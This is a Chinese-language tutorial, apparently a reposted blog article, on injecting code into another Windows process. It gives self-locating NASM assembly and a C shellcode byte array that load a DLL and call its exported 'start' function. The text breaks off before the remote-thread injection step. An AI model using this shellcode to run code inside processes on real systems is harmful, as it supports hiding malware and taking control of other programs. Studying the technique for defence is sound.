实战代码注入技术

 实际上就是创建远程线程，不同的是普通的办法都是 使用 LoadLibrary 函数，让其加载我们的dll然后将我们的代码写到dllmain 函数里面，已达到执行我们自定义代码的目的，那么能不能让目标程序加载我们的dll 并且调用这个dll的导出函数里，这个就要用到代码注入的技术了，和shellcode 很像，先写段汇编代码

  
extern _ExitProcess@4
extern _LoadLibraryA@4
extern _GetProcAddress@8
ExitProcess equ _ExitProcess@4
LoadLibraryA equ _LoadLibraryA@4
GetProcAddress equ _GetProcAddress@8

section .data

section .text

global _start

_start:
    call LAP
    ret
PROCNAME:db 'start',00
DLLNAME:db '1.dll',00
LAP:pop eax  ；代码自定位
    push eax
    push ebp
    mov ebp,esp
    push LoadLibraryA
    push GetProcAddress
    add  eax,1  ;此时eax指向call 的下一条指令也就是 ret 自增1 指向PROCNAME
    push eax
    add  eax,6 ;6 个字节 就是 PROCNAME 的长度 加之后 eax 指向 DLLNAME　
    push eax
    call [ebp-4]
    test eax,eax
    jz   EXIT
    push eax
    call [ebp-8]
    test eax,eax
    je   EXIT
    call eax
EXIT:leave
     ret

我们的shellcode 将使用 LoadLibrary 和 GetProcAddress 函数来加载一个dll 和调用dll的导出函数，这里有个问题就是虽然Library，GetProcAddress函数我们使用shellcode的时候可以将其更改为正确的函数地址，但是dll的名字还有导出函数的名字，如何在代码中动态的获取呢？这里就要用到代码自定位技术了。很简单

这样就定位到了 ret 这条指令的地址 ，然后+1 就得到字符串 start 的地址了。这就完成了代码的自定位。

剩下的就是调用函数了 将函数的地址都压到堆栈之中，这样可以使用 ebp 这个来定位函数指针。具体看代码。

编译完成后 使用OD 来加载，然后选中这部分代码，右键2进制复制 ，整理成 shellcode 形式，使用的时候 注意要将其中的 函数地址改成正确的，，Windows的一个特性就是 系统的 dll 在所有的 exe　中都会加载到相同的基质　那么　ａｐｉ　的地址在所有的进程中都是一样的。

下面测试下

#include <windows.h>
#include <STDIO.H>

byte shellcode[] = {\
0xE8,0x0D,0x00,0x00,0x00,
0xC3,0x73,0x74,0x61,0x72,
0x74,0x00,0x31,0x2E,0x64,
0x6C,0x6C,0x00,0x58,0x50,
0x55,0x89,0xE5,0x68,
0x3C,0x10,0x40,0x00,
0x68,
0x42,0x10,0x40,0x00,
0x83,0xC0,
0x01,0x50,0x83,0xC0,0x06,
0x50,0xFF,0x55,0xFC,0x85,
0xC0,0x74,0x0A,0x50,0xFF,
0x55,0xF8,0x85,0xC0,0x74,
0x02,0xFF,0xD0,0xC9,0xC3
};

//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)
 

亿恩科技地址(ADD)：郑州市黄河路129号天一大厦608室 邮编(ZIP)：450008 传真(FAX)：0371-60123888
   联系：亿恩小凡
   QQ：89317007
   电话:0371-63322206
 

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]